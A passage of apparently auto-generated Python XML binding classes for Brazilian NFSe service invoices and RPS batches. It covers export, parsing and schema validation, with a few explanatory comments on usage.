outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaDetalhesConsultaRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaDetalhesConsultaRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaDetalhesConsultaRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaDetalhesConsultaRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Detalhe_ in self.Detalhe:
Detalhe_.export(outfile, level, namespace_, name_='Detalhe', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Detalhe':
obj_ = tpDetalhesConsultaRPS.factory()
obj_.build(child_)
self.Detalhe.append(obj_)
obj_.original_tagname_ = 'Detalhe'
# end class tpListaDetalhesConsultaRPS
class tpListaErros(GeneratedsSuper):
"""Erros."""
subclass = None
superclass = None
def __init__(self, Erro=None):
self.original_tagname_ = None
if Erro is None:
self.Erro = []
else:
self.Erro = Erro
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaErros)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaErros.subclass:
return tpListaErros.subclass(*args_, **kwargs_)
else:
return tpListaErros(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Erro
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaErros', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaErros')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaErros')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaErros', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaErros'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaErros', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Erro_ in self.Erro:
Erro_.export(outfile, level, namespace_, name_='Erro', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Erro':
obj_ = tpEvento.factory()
obj_.build(child_)
self.Erro.append(obj_)
obj_.original_tagname_ = 'Erro'
# end class tpListaErros
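
# Parsing sketch (editorial addition): build() fills an instance from an
# ElementTree/lxml element, routing each child through buildChildren(). The
# fragment below is hand-written; real <Erro> payloads (tpEvento, defined
# elsewhere in this module) come from the web service response.
def _example_build_lista_erros():
    from xml.etree import ElementTree as ET
    root = ET.fromstring('<ListaErros><Erro/><Erro/></ListaErros>')
    lista = tpListaErros().build(root)
    # Each <Erro> child was instantiated through tpEvento.factory().
    return len(lista.Erro)  # 2
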
class tpListaItens(GeneratedsSuper):
"""Itens de Serviço."""
subclass = None
superclass = None
def __init__(self, Item=None):
self.original_tagname_ = None
if Item is None:
self.Item = []
else:
self.Item = Item
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaItens)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaItens.subclass:
return tpListaItens.subclass(*args_, **kwargs_)
else:
return tpListaItens(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Item
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaItens', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaItens')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaItens')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaItens', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaItens'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaItens', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Item_ in self.Item:
Item_.export(outfile, level, namespace_, name_='Item', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Item':
obj_ = tpItens.factory()
obj_.build(child_)
self.Item.append(obj_)
obj_.original_tagname_ = 'Item'
# end class tpListaItens
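
# Serialization detail (editorial addition): hasContent_() decides between a
# paired tag and a self-closing one in export(), so an empty container
# serializes as a single self-closing element.
def _example_empty_list_is_self_closing():
    import io
    buf = io.StringIO()
    tpListaItens().export(buf, 0)
    return buf.getvalue()  # '<ns1:tpListaItens/>\n'
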
class tpListaNFSeRPS(GeneratedsSuper):
"""NFSE e seu respectivo RPS"""
subclass = None
superclass = None
def __init__(self, ChaveNFSeRPS=None):
self.original_tagname_ = None
if ChaveNFSeRPS is None:
self.ChaveNFSeRPS = []
else:
self.ChaveNFSeRPS = ChaveNFSeRPS
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaNFSeRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaNFSeRPS.subclass:
return tpListaNFSeRPS.subclass(*args_, **kwargs_)
else:
return tpListaNFSeRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.ChaveNFSeRPS
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaNFSeRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaNFSeRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaNFSeRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaNFSeRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaNFSeRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaNFSeRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for ChaveNFSeRPS_ in self.ChaveNFSeRPS:
ChaveNFSeRPS_.export(outfile, level, namespace_, name_='ChaveNFSeRPS', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ChaveNFSeRPS':
obj_ = tpChaveNFeRPS.factory()
obj_.build(child_)
self.ChaveNFSeRPS.append(obj_)
obj_.original_tagname_ = 'ChaveNFSeRPS'
# end class tpListaNFSeRPS
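
# Namespace note (editorial addition): every export() first checks the
# module-level GenerateDSNamespaceDefs_ dict, so a namespace declaration can
# be attached per element name once instead of passing namespacedef_ on
# every call (the URI below is an assumption, not taken from the schema):
#
#     GenerateDSNamespaceDefs_['tpListaNFSeRPS'] = (
#         'xmlns:ns1="http://localhost:8080/WsNFe2/lote"')
#
# When present, this value overrides whatever namespacedef_ the caller gave.
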
class tpListaNFSe(GeneratedsSuper):
"""Lista de NFSE consultada"""
subclass = None
superclass = None
def __init__(self, ConsultaNFSe=None):
self.original_tagname_ = None
if ConsultaNFSe is None:
self.ConsultaNFSe = []
else:
self.ConsultaNFSe = ConsultaNFSe
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaNFSe.subclass:
return tpListaNFSe.subclass(*args_, **kwargs_)
else:
return tpListaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.ConsultaNFSe
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for ConsultaNFSe_ in self.ConsultaNFSe:
ConsultaNFSe_.export(outfile, level, namespace_, name_='ConsultaNFSe', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ConsultaNFSe':
obj_ = tpConsultaNFSe.factory()
obj_.build(child_)
self.ConsultaNFSe.append(obj_)
obj_.original_tagname_ = 'ConsultaNFSe'
# end class tpListaNFSe
class tpListaNFSeConsultaNota(GeneratedsSuper):
"""Lista de NFSE consultada"""
subclass = None
superclass = None
def __init__(self, Nota=None):
self.original_tagname_ = None
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaNFSeConsultaNota)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaNFSeConsultaNota.subclass:
return tpListaNFSeConsultaNota.subclass(*args_, **kwargs_)
else:
return tpListaNFSeConsultaNota(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaNFSeConsultaNota', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaNFSeConsultaNota')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaNFSeConsultaNota')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaNFSeConsultaNota', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaNFSeConsultaNota'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaNFSeConsultaNota', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpListaNFSeConsultaNota
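
# Round-trip note (editorial addition): buildChildren() records the matched
# tag in original_tagname_ ('Nota' above), and export() prefers that stored
# name over its name_ default, so an object parsed from XML is re-serialized
# under the element name it originally carried.
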
class tpLote(GeneratedsSuper):
"""Lote de RPS"""
subclass = None
superclass = None
def __init__(self, Id=None, RPS=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
if RPS is None:
self.RPS = []
else:
self.RPS = RPS
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpLote)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpLote.subclass:
return tpLote.subclass(*args_, **kwargs_)
else:
return tpLote(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.RPS
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpLote', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpLote')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpLote')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpLote', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpLote'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpLote', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for RPS_ in self.RPS:
RPS_.export(outfile, level, namespace_, name_='RPS', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'RPS':
obj_ = tpRPS.factory()
obj_.build(child_)
self.RPS.append(obj_)
obj_.original_tagname_ = 'RPS'
# end class tpLote
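
# Assembly sketch (editorial addition): a tpLote is an Id attribute plus a
# list of tpRPS objects (tpRPS is defined elsewhere in this module, so its
# constructor arguments are not reproduced here). A minimal, hypothetical
# batch looks like:
#
#     lote = tpLote(Id='lote:1')
#     lote.RPS.append(tpRPS(...))  # one entry per receipt in the batch
#     lote.export(outfile, 1)
#
# exportAttributes() writes Id as an XML attribute, and exportChildren()
# serializes every appended object as an <RPS> child element.
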
class tpNFSe(GeneratedsSuper):
"""Tipo que representa uma NFSe"""
subclass = None
superclass = None
def __init__(self, NumeroNota=None, DataProcessamento=None, NumeroLote=None, CodigoVerificacao=None, Assinatura=None, InscricaoMunicipalPrestador=None, RazaoSocialPrestador=None, TipoRPS=None, SerieRPS=None, NumeroRPS=None, DataEmissaoRPS=None, SituacaoRPS=None, SerieRPSSubstituido=None, NumeroRPSSubstituido=None, NumeroNFSeSubstituida=None, DataEmissaoNFSeSubstituida=None, SeriePrestacao=None, InscricaoMunicipalTomador=None, CPFCNPJTomador=None, RazaoSocialTomador=None, DocTomadorEstrangeiro=None, TipoLogradouroTomador=None, LogradouroTomador=None, NumeroEnderecoTomador=None, ComplementoEnderecoTomador=None, TipoBairroTomador=None, BairroTomador=None, CidadeTomador=None, CidadeTomadorDescricao=None, CEPTomador=None, EmailTomador=None, CodigoAtividade=None, AliquotaAtividade=None, TipoRecolhimento=None, MunicipioPrestacao=None, MunicipioPrestacaoDescricao=None, Operacao=None, Tributacao=None, ValorPIS=None, ValorCOFINS=None, ValorINSS=None, ValorIR=None, ValorCSLL=None, AliquotaPIS=None, AliquotaCOFINS=None, AliquotaINSS=None, AliquotaIR=None, AliquotaCSLL=None, DescricaoRPS=None, DDDPrestador=None, TelefonePrestador=None, DDDTomador=None, TelefoneTomador=None, MotCancelamento=None, CPFCNPJIntermediario=None, Deducoes=None, Itens=None):
self.original_tagname_ = None
self.NumeroNota = NumeroNota
self.validate_tpNumero(self.NumeroNota)
if isinstance(DataProcessamento, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataProcessamento, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataProcessamento
self.DataProcessamento = initvalue_
self.NumeroLote = NumeroLote
self.validate_tpNumero(self.NumeroLote)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
self.Assinatura = Assinatura
self.validate_tpAssinatura(self.Assinatura)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocialPrestador(self.RazaoSocialPrestador)
self.TipoRPS = TipoRPS
self.validate_tpTipoRPS(self.TipoRPS)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
if isinstance(DataEmissaoRPS, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoRPS, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEmissaoRPS
self.DataEmissaoRPS = initvalue_
self.SituacaoRPS = SituacaoRPS
self.validate_tpSituacaoRPS(self.SituacaoRPS)
self.SerieRPSSubstituido = SerieRPSSubstituido
self.validate_tpSerieRPSSubstituido(self.SerieRPSSubstituido)
self.NumeroRPSSubstituido = NumeroRPSSubstituido
self.validate_tpNumeroComZero(self.NumeroRPSSubstituido)
self.NumeroNFSeSubstituida = NumeroNFSeSubstituida
self.validate_tpNumeroComZero(self.NumeroNFSeSubstituida)
self.DataEmissaoNFSeSubstituida = DataEmissaoNFSeSubstituida
self.validate_tpDataHoraNulo(self.DataEmissaoNFSeSubstituida)
self.SeriePrestacao = SeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
self.InscricaoMunicipalTomador = InscricaoMunicipalTomador
self.validate_tpInscricaoMunicipalNulo(self.InscricaoMunicipalTomador)
self.CPFCNPJTomador = CPFCNPJTomador
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
self.RazaoSocialTomador = RazaoSocialTomador
self.validate_tpRazaoSocial(self.RazaoSocialTomador)
self.DocTomadorEstrangeiro = DocTomadorEstrangeiro
self.validate_tpDocTomadorEstrangeiro(self.DocTomadorEstrangeiro)
self.TipoLogradouroTomador = TipoLogradouroTomador
self.validate_tpTipoLogradouro(self.TipoLogradouroTomador)
self.LogradouroTomador = LogradouroTomador
self.validate_tpLogradouro(self.LogradouroTomador)
self.NumeroEnderecoTomador = NumeroEnderecoTomador
self.validate_tpNumeroEndereco(self.NumeroEnderecoTomador)
self.ComplementoEnderecoTomador = ComplementoEnderecoTomador
self.validate_tpComplementoEndereco(self.ComplementoEnderecoTomador)
self.TipoBairroTomador = TipoBairroTomador
self.validate_tpTipoBairro(self.TipoBairroTomador)
self.BairroTomador = BairroTomador
self.validate_tpBairro(self.BairroTomador)
self.CidadeTomador = CidadeTomador
self.validate_tpCodCidade(self.CidadeTomador)
self.CidadeTomadorDescricao = CidadeTomadorDescricao
self.validate_tpCidadeTomadorDescricao(self.CidadeTomadorDescricao)
self.CEPTomador = CEPTomador
self.validate_tpCEPNulo(self.CEPTomador)
self.EmailTomador = EmailTomador
self.validate_tpEmail(self.EmailTomador)
self.CodigoAtividade = CodigoAtividade
self.validate_tpCodigoAtividade(self.CodigoAtividade)
self.AliquotaAtividade = AliquotaAtividade
self.validate_tpAliquota(self.AliquotaAtividade)
self.TipoRecolhimento = TipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
self.MunicipioPrestacao = MunicipioPrestacao
self.validate_tpCodCidade(self.MunicipioPrestacao)
self.MunicipioPrestacaoDescricao = MunicipioPrestacaoDescricao
self.validate_tpCidadeDescricao(self.MunicipioPrestacaoDescricao)
self.Operacao = Operacao
self.validate_tpOperacao(self.Operacao)
self.Tributacao = Tributacao
self.validate_tpTributacao(self.Tributacao)
self.ValorPIS = ValorPIS
self.validate_tpValor(self.ValorPIS)
self.ValorCOFINS = ValorCOFINS
self.validate_tpValor(self.ValorCOFINS)
self.ValorINSS = ValorINSS
self.validate_tpValor(self.ValorINSS)
self.ValorIR = ValorIR
self.validate_tpValor(self.ValorIR)
self.ValorCSLL = ValorCSLL
self.validate_tpValor(self.ValorCSLL)
self.AliquotaPIS = AliquotaPIS
self.validate_tpAliquota(self.AliquotaPIS)
self.AliquotaCOFINS = AliquotaCOFINS
self.validate_tpAliquota(self.AliquotaCOFINS)
self.AliquotaINSS = AliquotaINSS
self.validate_tpAliquota(self.AliquotaINSS)
self.AliquotaIR = AliquotaIR
self.validate_tpAliquota(self.AliquotaIR)
self.AliquotaCSLL = AliquotaCSLL
self.validate_tpAliquota(self.AliquotaCSLL)
self.DescricaoRPS = DescricaoRPS
self.validate_tpDescricaoRPS(self.DescricaoRPS)
self.DDDPrestador = DDDPrestador
self.validate_tpDDDNulo(self.DDDPrestador)
self.TelefonePrestador = TelefonePrestador
self.validate_tpFoneNulo(self.TelefonePrestador)
self.DDDTomador = DDDTomador
self.validate_tpDDDNulo(self.DDDTomador)
self.TelefoneTomador = TelefoneTomador
self.validate_tpFoneNulo(self.TelefoneTomador)
self.MotCancelamento = MotCancelamento
self.validate_tpMotCancelamento(self.MotCancelamento)
self.CPFCNPJIntermediario = CPFCNPJIntermediario
self.validate_tpCPFCNPJnulo(self.CPFCNPJIntermediario)
self.Deducoes = Deducoes
self.Itens = Itens
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNFSe.subclass:
return tpNFSe.subclass(*args_, **kwargs_)
else:
return tpNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
            if not self.gds_validate_simple_patterns(
                    self.validate_tpNumero_patterns_, str(value)):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def validate_tpAssinatura(self, value):
# Validate type tpAssinatura, a restriction on xs:base64Binary.
if value is not None and Validate_simpletypes_:
pass
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
            if not self.gds_validate_simple_patterns(
                    self.validate_tpInscricaoMunicipal_patterns_, str(value)):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpRazaoSocialPrestador(self, value):
# Validate type tpRazaoSocialPrestador, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocialPrestador' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocialPrestador' % {"value" : value.encode("utf-8")} )
def validate_tpTipoRPS(self, value):
# Validate type tpTipoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['RPS']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRPS' % {"value" : value.encode("utf-8")} )
if len(value) > 20:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpDataHora(self, value):
# Validate type tpDataHora, a restriction on xs:dateTime.
if value is not None and Validate_simpletypes_:
pass
def validate_tpSituacaoRPS(self, value):
# Validate type tpSituacaoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['N', 'C']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSituacaoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPSSubstituido(self, value):
# Validate type tpSerieRPSSubstituido, a restriction on None.
pass
def validate_tpNumeroComZero(self, value):
# Validate type tpNumeroComZero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumeroComZero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumeroComZero' % {"value" : value} )
            if not self.gds_validate_simple_patterns(
                    self.validate_tpNumeroComZero_patterns_, str(value)):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpNumeroComZero_patterns_, ))
validate_tpNumeroComZero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpDataHoraNulo(self, value):
# Validate type tpDataHoraNulo, a restriction on None.
pass
def validate_tpSeriePrestacao(self, value):
# Validate type tpSeriePrestacao, a restriction on xs:byte.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpSeriePrestacao' % {"value" : value} )
